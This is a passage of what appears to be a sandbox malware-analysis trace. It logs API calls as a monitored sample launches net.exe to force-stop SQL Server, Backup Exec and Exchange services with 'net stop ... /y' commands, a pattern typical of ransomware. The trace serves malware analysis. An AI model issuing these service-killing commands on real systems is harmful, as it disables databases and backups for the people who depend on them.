[0202.959] _wcsicmp (_String1="accounts", _String2="MSSQL$BKUPEXEC") returned -12 [0202.959] _wcsicmp (_String1="computer", _String2="MSSQL$BKUPEXEC") returned -10 [0202.959] _wcsicmp (_String1="config", _String2="MSSQL$BKUPEXEC") returned -10 [0202.959] _wcsicmp (_String1="continue", _String2="MSSQL$BKUPEXEC") returned -10 [0202.959] _wcsicmp (_String1="cont", _String2="MSSQL$BKUPEXEC") returned -10 [0202.959] _wcsicmp (_String1="file", _String2="MSSQL$BKUPEXEC") returned -7 [0202.959] _wcsicmp (_String1="files", _String2="MSSQL$BKUPEXEC") returned -7 [0202.959] _wcsicmp (_String1="group", _String2="MSSQL$BKUPEXEC") returned -6 [0202.959] _wcsicmp (_String1="groups", _String2="MSSQL$BKUPEXEC") returned -6 [0202.959] _wcsicmp (_String1="help", _String2="MSSQL$BKUPEXEC") returned -5 [0202.959] _wcsicmp (_String1="helpmsg", _String2="MSSQL$BKUPEXEC") returned -5 [0202.959] _wcsicmp (_String1="localgroup", _String2="MSSQL$BKUPEXEC") returned -1 [0202.959] _wcsicmp (_String1="pause", _String2="MSSQL$BKUPEXEC") returned 3 [0202.959] _wcsicmp (_String1="session", _String2="MSSQL$BKUPEXEC") returned 6 [0202.959] _wcsicmp (_String1="sessions", _String2="MSSQL$BKUPEXEC") returned 6 [0202.959] _wcsicmp (_String1="sess", _String2="MSSQL$BKUPEXEC") returned 6 [0202.959] _wcsicmp (_String1="share", _String2="MSSQL$BKUPEXEC") returned 6 [0202.959] _wcsicmp (_String1="start", _String2="MSSQL$BKUPEXEC") returned 6 [0202.959] _wcsicmp (_String1="stats", _String2="MSSQL$BKUPEXEC") returned 6 [0202.959] _wcsicmp (_String1="statistics", _String2="MSSQL$BKUPEXEC") returned 6 [0202.959] _wcsicmp (_String1="stop", _String2="MSSQL$BKUPEXEC") returned 6 [0202.960] _wcsicmp (_String1="time", _String2="MSSQL$BKUPEXEC") returned 7 [0202.960] _wcsicmp (_String1="user", _String2="MSSQL$BKUPEXEC") returned 8 [0202.960] _wcsicmp (_String1="users", _String2="MSSQL$BKUPEXEC") returned 8 [0202.960] _wcsicmp (_String1="msg", _String2="MSSQL$BKUPEXEC") returned -12 [0202.960] _wcsicmp (_String1="messenger", _String2="MSSQL$BKUPEXEC") returned -14 [0202.960] _wcsicmp (_String1="receiver", _String2="MSSQL$BKUPEXEC") returned 5 [0202.960] _wcsicmp (_String1="rcv", _String2="MSSQL$BKUPEXEC") returned 5 [0202.960] _wcsicmp (_String1="netpopup", _String2="MSSQL$BKUPEXEC") returned 1 [0202.960] _wcsicmp (_String1="redirector", _String2="MSSQL$BKUPEXEC") returned 5 [0202.960] _wcsicmp (_String1="redir", _String2="MSSQL$BKUPEXEC") returned 5 [0202.960] _wcsicmp (_String1="rdr", _String2="MSSQL$BKUPEXEC") returned 5 [0202.960] _wcsicmp (_String1="workstation", _String2="MSSQL$BKUPEXEC") returned 10 [0202.960] _wcsicmp (_String1="work", _String2="MSSQL$BKUPEXEC") returned 10 [0202.960] _wcsicmp (_String1="wksta", _String2="MSSQL$BKUPEXEC") returned 10 [0202.960] _wcsicmp (_String1="prdr", _String2="MSSQL$BKUPEXEC") returned 3 [0202.960] _wcsicmp (_String1="devrdr", _String2="MSSQL$BKUPEXEC") returned -9 [0202.960] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$BKUPEXEC") returned -1 [0202.960] _wcsicmp (_String1="server", _String2="MSSQL$BKUPEXEC") returned 6 [0202.960] _wcsicmp (_String1="svr", _String2="MSSQL$BKUPEXEC") returned 6 [0202.960] _wcsicmp (_String1="srv", _String2="MSSQL$BKUPEXEC") returned 6 [0202.960] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$BKUPEXEC") returned -1 [0202.960] _wcsicmp (_String1="alerter", _String2="MSSQL$BKUPEXEC") returned -12 [0202.960] _wcsicmp (_String1="netlogon", _String2="MSSQL$BKUPEXEC") returned 1 [0202.960] _wcsupr (in: _String="MSSQL$BKUPEXEC" | out: _String="MSSQL$BKUPEXEC") returned="MSSQL$BKUPEXEC" [0202.960] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3154d8 [0202.963] GetServiceKeyNameW (in: hSCManager=0x3154d8, lpDisplayName="MSSQL$BKUPEXEC", lpServiceName=0xedaaf0, lpcchBuffer=0x2bfea0 | out: lpServiceName="", lpcchBuffer=0x2bfea0) returned 0 [0202.963] _wcsicmp (_String1="msg", _String2="MSSQL$BKUPEXEC") returned -12 [0202.963] _wcsicmp (_String1="messenger", _String2="MSSQL$BKUPEXEC") returned -14 [0202.963] _wcsicmp (_String1="receiver", _String2="MSSQL$BKUPEXEC") returned 5 [0202.963] _wcsicmp (_String1="rcv", _String2="MSSQL$BKUPEXEC") returned 5 [0202.963] _wcsicmp (_String1="redirector", _String2="MSSQL$BKUPEXEC") returned 5 [0202.963] _wcsicmp (_String1="redir", _String2="MSSQL$BKUPEXEC") returned 5 [0202.963] _wcsicmp (_String1="rdr", _String2="MSSQL$BKUPEXEC") returned 5 [0202.963] _wcsicmp (_String1="workstation", _String2="MSSQL$BKUPEXEC") returned 10 [0202.963] _wcsicmp (_String1="work", _String2="MSSQL$BKUPEXEC") returned 10 [0202.964] _wcsicmp (_String1="wksta", _String2="MSSQL$BKUPEXEC") returned 10 [0202.964] _wcsicmp (_String1="prdr", _String2="MSSQL$BKUPEXEC") returned 3 [0202.964] _wcsicmp (_String1="devrdr", _String2="MSSQL$BKUPEXEC") returned -9 [0202.964] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$BKUPEXEC") returned -1 [0202.964] _wcsicmp (_String1="server", _String2="MSSQL$BKUPEXEC") returned 6 [0202.964] _wcsicmp (_String1="svr", _String2="MSSQL$BKUPEXEC") returned 6 [0202.964] _wcsicmp (_String1="srv", _String2="MSSQL$BKUPEXEC") returned 6 [0202.964] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$BKUPEXEC") returned -1 [0202.964] _wcsicmp (_String1="alerter", _String2="MSSQL$BKUPEXEC") returned -12 [0202.964] _wcsicmp (_String1="netlogon", _String2="MSSQL$BKUPEXEC") returned 1 [0202.964] NetServiceControl (in: servername=0x0, service="MSSQL$BKUPEXEC", opcode=0x0, arg=0x0, bufptr=0x2bfe9c | out: bufptr=0x2bfe9c) returned 0x889 [0202.965] wcscpy_s (in: _Destination=0xeda4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0202.965] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0202.965] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xedb338, nSize=0x800, Arguments=0xed9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0202.966] GetFileType (hFile=0x26c) returned 0x3 [0202.966] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x314008 [0202.967] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x314008, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0202.967] WriteFile (in: hFile=0x26c, lpBuffer=0x314008, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2bfddc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bfddc, lpOverlapped=0x0) returned 0 [0202.967] LocalFree (hMem=0x314008) returned 0x0 [0202.967] GetFileType (hFile=0x26c) returned 0x3 [0202.967] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3162b0 [0202.967] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3162b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n1", lpUsedDefaultChar=0x0) returned 2 [0202.967] WriteFile (in: hFile=0x26c, lpBuffer=0x3162b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2bfddc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bfddc, lpOverlapped=0x0) returned 0 [0202.967] LocalFree (hMem=0x3162b0) returned 0x0 [0202.967] _ultow (in: _Dest=0x889, _Radix=2883084 | out: _Dest=0x889) returned="2185" [0202.967] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xedb338, nSize=0x800, Arguments=0xed9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0202.967] GetFileType (hFile=0x26c) returned 0x3 [0202.967] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3162b0 [0202.967] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3162b0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0202.967] WriteFile (in: hFile=0x26c, lpBuffer=0x3162b0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2bfde8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bfde8, lpOverlapped=0x0) returned 0 [0202.967] LocalFree (hMem=0x3162b0) returned 0x0 [0202.967] GetFileType (hFile=0x26c) returned 0x3 [0202.967] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3162b0 [0202.967] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3162b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n1", lpUsedDefaultChar=0x0) returned 2 [0202.967] WriteFile (in: hFile=0x26c, lpBuffer=0x3162b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2bfde8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bfde8, lpOverlapped=0x0) returned 0 [0202.967] LocalFree (hMem=0x3162b0) returned 0x0 [0202.968] NetApiBufferFree (Buffer=0x311c78) returned 0x0 [0202.968] NetApiBufferFree (Buffer=0x311c90) returned 0x0 [0202.968] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$BKUPEXEC /y" [0202.968] exit (_Code=2) Process: id = "200" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6a2b8000" os_pid = "0xbc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$PRACTTICEBGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 373 os_tid = 0xb94 Process: id = "201" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x21c20000" os_pid = "0xba8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "200" os_parent_pid = "0xbc0" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$PRACTTICEBGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 374 os_tid = 0x60c [0203.105] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fe68 | out: lpSystemTimeAsFileTime=0x22fe68*(dwLowDateTime=0x42403740, dwHighDateTime=0x1d57a87)) [0203.105] GetCurrentProcessId () returned 0xba8 [0203.105] GetCurrentThreadId () returned 0x60c [0203.105] GetTickCount () returned 0x116c67b [0203.105] QueryPerformanceCounter (in: lpPerformanceCount=0x22fe60 | out: lpPerformanceCount=0x22fe60*=32338993797) returned 1 [0203.106] GetModuleHandleA (lpModuleName=0x0) returned 0x830000 [0203.106] __set_app_type (_Type=0x1) [0203.106] __p__fmode () returned 0x74eb31f4 [0203.106] __p__commode () returned 0x74eb31fc [0203.106] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x83ffe6) returned 0x0 [0203.106] __getmainargs (in: _Argc=0x849064, _Argv=0x84906c, _Env=0x849068, _DoWildCard=0, _StartInfo=0x849024 | out: _Argc=0x849064, _Argv=0x84906c, _Env=0x849068) returned 0 [0203.106] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0203.106] GetConsoleOutputCP () returned 0x1b5 [0203.106] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x849080 | out: lpCPInfo=0x849080) returned 1 [0203.106] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.109] sprintf_s (in: _DstBuf=0x22fe20, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0203.109] setlocale (category=0, locale=".437") returned="English_United States.437" [0203.111] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0203.111] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0203.111] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$PRACTTICEBGC /y" [0203.111] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x22fbec, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0203.111] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x7e) returned 0x663c20 [0203.111] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0203.112] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x22fdf0 | out: Buffer=0x22fdf0*=0x661c80) returned 0x0 [0203.112] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x22fdf0 | out: Buffer=0x22fdf0*=0x661c98) returned 0x0 [0203.112] _fileno (_File=0x74eb2900) returned -2 [0203.112] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0203.112] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0203.112] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0203.112] _wcsicmp (_String1="config", _String2="stop") returned -16 [0203.112] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0203.112] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0203.112] _wcsicmp (_String1="file", _String2="stop") returned -13 [0203.112] _wcsicmp (_String1="files", _String2="stop") returned -13 [0203.112] _wcsicmp (_String1="group", _String2="stop") returned -12 [0203.112] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0203.112] _wcsicmp (_String1="help", _String2="stop") returned -11 [0203.112] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0203.112] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0203.112] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0203.112] _wcsicmp (_String1="session", _String2="stop") returned -15 [0203.112] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0203.112] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0203.112] _wcsicmp (_String1="share", _String2="stop") returned -12 [0203.112] _wcsicmp (_String1="start", _String2="stop") returned -14 [0203.112] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0203.112] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0203.112] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0203.112] _wcsicmp (_String1="accounts", _String2="SQLAgent$PRACTTICEBGC") returned -18 [0203.112] _wcsicmp (_String1="computer", _String2="SQLAgent$PRACTTICEBGC") returned -16 [0203.112] _wcsicmp (_String1="config", _String2="SQLAgent$PRACTTICEBGC") returned -16 [0203.112] _wcsicmp (_String1="continue", _String2="SQLAgent$PRACTTICEBGC") returned -16 [0203.112] _wcsicmp (_String1="cont", _String2="SQLAgent$PRACTTICEBGC") returned -16 [0203.112] _wcsicmp (_String1="file", _String2="SQLAgent$PRACTTICEBGC") returned -13 [0203.112] _wcsicmp (_String1="files", _String2="SQLAgent$PRACTTICEBGC") returned -13 [0203.113] _wcsicmp (_String1="group", _String2="SQLAgent$PRACTTICEBGC") returned -12 [0203.113] _wcsicmp (_String1="groups", _String2="SQLAgent$PRACTTICEBGC") returned -12 [0203.113] _wcsicmp (_String1="help", _String2="SQLAgent$PRACTTICEBGC") returned -11 [0203.113] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$PRACTTICEBGC") returned -11 [0203.113] _wcsicmp (_String1="localgroup", _String2="SQLAgent$PRACTTICEBGC") returned -7 [0203.113] _wcsicmp (_String1="pause", _String2="SQLAgent$PRACTTICEBGC") returned -3 [0203.113] _wcsicmp (_String1="session", _String2="SQLAgent$PRACTTICEBGC") returned -12 [0203.113] _wcsicmp (_String1="sessions", _String2="SQLAgent$PRACTTICEBGC") returned -12 [0203.113] _wcsicmp (_String1="sess", _String2="SQLAgent$PRACTTICEBGC") returned -12 [0203.113] _wcsicmp (_String1="share", _String2="SQLAgent$PRACTTICEBGC") returned -9 [0203.113] _wcsicmp (_String1="start", _String2="SQLAgent$PRACTTICEBGC") returned 3 [0203.113] _wcsicmp (_String1="stats", _String2="SQLAgent$PRACTTICEBGC") returned 3 [0203.113] _wcsicmp (_String1="statistics", _String2="SQLAgent$PRACTTICEBGC") returned 3 [0203.113] _wcsicmp (_String1="stop", _String2="SQLAgent$PRACTTICEBGC") returned 3 [0203.113] _wcsicmp (_String1="time", _String2="SQLAgent$PRACTTICEBGC") returned 1 [0203.113] _wcsicmp (_String1="user", _String2="SQLAgent$PRACTTICEBGC") returned 2 [0203.113] _wcsicmp (_String1="users", _String2="SQLAgent$PRACTTICEBGC") returned 2 [0203.113] _wcsicmp (_String1="msg", _String2="SQLAgent$PRACTTICEBGC") returned -6 [0203.113] _wcsicmp (_String1="messenger", _String2="SQLAgent$PRACTTICEBGC") returned -6 [0203.113] _wcsicmp (_String1="receiver", _String2="SQLAgent$PRACTTICEBGC") returned -1 [0203.113] _wcsicmp (_String1="rcv", _String2="SQLAgent$PRACTTICEBGC") returned -1 [0203.113] _wcsicmp (_String1="netpopup", _String2="SQLAgent$PRACTTICEBGC") returned -5 [0203.113] _wcsicmp (_String1="redirector", _String2="SQLAgent$PRACTTICEBGC") returned -1 [0203.113] _wcsicmp (_String1="redir", _String2="SQLAgent$PRACTTICEBGC") returned -1 [0203.113] _wcsicmp (_String1="rdr", _String2="SQLAgent$PRACTTICEBGC") returned -1 [0203.113] _wcsicmp (_String1="workstation", _String2="SQLAgent$PRACTTICEBGC") returned 4 [0203.113] _wcsicmp (_String1="work", _String2="SQLAgent$PRACTTICEBGC") returned 4 [0203.113] _wcsicmp (_String1="wksta", _String2="SQLAgent$PRACTTICEBGC") returned 4 [0203.113] _wcsicmp (_String1="prdr", _String2="SQLAgent$PRACTTICEBGC") returned -3 [0203.113] _wcsicmp (_String1="devrdr", _String2="SQLAgent$PRACTTICEBGC") returned -15 [0203.113] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$PRACTTICEBGC") returned -7 [0203.113] _wcsicmp (_String1="server", _String2="SQLAgent$PRACTTICEBGC") returned -12 [0203.113] _wcsicmp (_String1="svr", _String2="SQLAgent$PRACTTICEBGC") returned 5 [0203.113] _wcsicmp (_String1="srv", _String2="SQLAgent$PRACTTICEBGC") returned 1 [0203.113] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$PRACTTICEBGC") returned -7 [0203.113] _wcsicmp (_String1="alerter", _String2="SQLAgent$PRACTTICEBGC") returned -18 [0203.113] _wcsicmp (_String1="netlogon", _String2="SQLAgent$PRACTTICEBGC") returned -5 [0203.114] _wcsupr (in: _String="SQLAgent$PRACTTICEBGC" | out: _String="SQLAGENT$PRACTTICEBGC") returned="SQLAGENT$PRACTTICEBGC" [0203.114] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6654f0 [0203.116] GetServiceKeyNameW (in: hSCManager=0x6654f0, lpDisplayName="SQLAGENT$PRACTTICEBGC", lpServiceName=0x84aaf0, lpcchBuffer=0x22fd8c | out: lpServiceName="", lpcchBuffer=0x22fd8c) returned 0 [0203.117] _wcsicmp (_String1="msg", _String2="SQLAGENT$PRACTTICEBGC") returned -6 [0203.117] _wcsicmp (_String1="messenger", _String2="SQLAGENT$PRACTTICEBGC") returned -6 [0203.117] _wcsicmp (_String1="receiver", _String2="SQLAGENT$PRACTTICEBGC") returned -1 [0203.117] _wcsicmp (_String1="rcv", _String2="SQLAGENT$PRACTTICEBGC") returned -1 [0203.117] _wcsicmp (_String1="redirector", _String2="SQLAGENT$PRACTTICEBGC") returned -1 [0203.117] _wcsicmp (_String1="redir", _String2="SQLAGENT$PRACTTICEBGC") returned -1 [0203.117] _wcsicmp (_String1="rdr", _String2="SQLAGENT$PRACTTICEBGC") returned -1 [0203.117] _wcsicmp (_String1="workstation", _String2="SQLAGENT$PRACTTICEBGC") returned 4 [0203.117] _wcsicmp (_String1="work", _String2="SQLAGENT$PRACTTICEBGC") returned 4 [0203.117] _wcsicmp (_String1="wksta", _String2="SQLAGENT$PRACTTICEBGC") returned 4 [0203.117] _wcsicmp (_String1="prdr", _String2="SQLAGENT$PRACTTICEBGC") returned -3 [0203.117] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$PRACTTICEBGC") returned -15 [0203.117] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$PRACTTICEBGC") returned -7 [0203.117] _wcsicmp (_String1="server", _String2="SQLAGENT$PRACTTICEBGC") returned -12 [0203.117] _wcsicmp (_String1="svr", _String2="SQLAGENT$PRACTTICEBGC") returned 5 [0203.117] _wcsicmp (_String1="srv", _String2="SQLAGENT$PRACTTICEBGC") returned 1 [0203.117] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$PRACTTICEBGC") returned -7 [0203.117] _wcsicmp (_String1="alerter", _String2="SQLAGENT$PRACTTICEBGC") returned -18 [0203.117] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$PRACTTICEBGC") returned -5 [0203.117] NetServiceControl (in: servername=0x0, service="SQLAGENT$PRACTTICEBGC", opcode=0x0, arg=0x0, bufptr=0x22fd88 | out: bufptr=0x22fd88) returned 0x889 [0203.118] wcscpy_s (in: _Destination=0x84a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0203.118] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0203.119] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x84b338, nSize=0x800, Arguments=0x849dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0203.120] GetFileType (hFile=0x26c) returned 0x3 [0203.120] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x664020 [0203.120] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x664020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\ne", lpUsedDefaultChar=0x0) returned 30 [0203.120] WriteFile (in: hFile=0x26c, lpBuffer=0x664020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x22fcc8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22fcc8, lpOverlapped=0x0) returned 0 [0203.120] LocalFree (hMem=0x664020) returned 0x0 [0203.120] GetFileType (hFile=0x26c) returned 0x3 [0203.120] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6662c8 [0203.120] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6662c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nf", lpUsedDefaultChar=0x0) returned 2 [0203.120] WriteFile (in: hFile=0x26c, lpBuffer=0x6662c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x22fcc8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22fcc8, lpOverlapped=0x0) returned 0 [0203.120] LocalFree (hMem=0x6662c8) returned 0x0 [0203.120] _ultow (in: _Dest=0x889, _Radix=2292984 | out: _Dest=0x889) returned="2185" [0203.120] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x84b338, nSize=0x800, Arguments=0x849dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0203.120] GetFileType (hFile=0x26c) returned 0x3 [0203.120] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6662c8 [0203.121] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6662c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0203.121] WriteFile (in: hFile=0x26c, lpBuffer=0x6662c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x22fcd4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22fcd4, lpOverlapped=0x0) returned 0 [0203.121] LocalFree (hMem=0x6662c8) returned 0x0 [0203.121] GetFileType (hFile=0x26c) returned 0x3 [0203.121] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6662c8 [0203.121] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6662c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nf", lpUsedDefaultChar=0x0) returned 2 [0203.121] WriteFile (in: hFile=0x26c, lpBuffer=0x6662c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x22fcd4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22fcd4, lpOverlapped=0x0) returned 0 [0203.121] LocalFree (hMem=0x6662c8) returned 0x0 [0203.121] NetApiBufferFree (Buffer=0x661c80) returned 0x0 [0203.121] NetApiBufferFree (Buffer=0x661c98) returned 0x0 [0203.121] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$PRACTTICEBGC /y" [0203.122] exit (_Code=2) Process: id = "202" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x686bd000" os_pid = "0x5b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSExchangeSRS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 375 os_tid = 0x980 Process: id = "203" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x68c88000" os_pid = "0x40c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "202" os_parent_pid = "0x5b4" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeSRS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT 